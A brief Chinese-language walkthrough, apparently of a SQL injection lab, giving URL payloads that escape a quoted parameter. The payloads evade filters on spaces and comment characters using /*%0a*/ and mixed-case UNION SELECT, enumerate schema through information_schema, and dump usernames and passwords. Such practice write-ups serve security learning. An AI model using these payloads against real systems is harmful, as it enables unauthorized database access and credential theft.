0x01 判断注入点
单引号字符型,过滤掉了#,--,空格等字符
?id=1'%26%26'1'='1
#%26为&
成功闭合
0x02 判断数据库名
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,database(),4/*%0a*/||/*%0a*/'1'='1
#使用/*%0a*/强行制造空格,unionselect随机大小写绕过
0x03 判断表名
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(table_name)/*%0a*/from/*%0a*/information_schema.tables/*%0a*/where/*%0a*/table_schema='security'),4/*%0a*/||/*%0a*/'1'='1
0x03 判断列名
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(column_name)/*%0a*/from/*%0a*/information_schema.columns/*%0a*/where/*%0a*/table_schema='security'/*%0a*/%26%26/*%0a*/table_name='users'),4/*%0a*/||/*%0a*/'1'='1
0x04 得到数据
?id=1234'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeleCt/*%0a*/group_concat(username,password)/*%0a*/from/*%0a*/users),4/*%0a*/||/*%0a*/'1'='1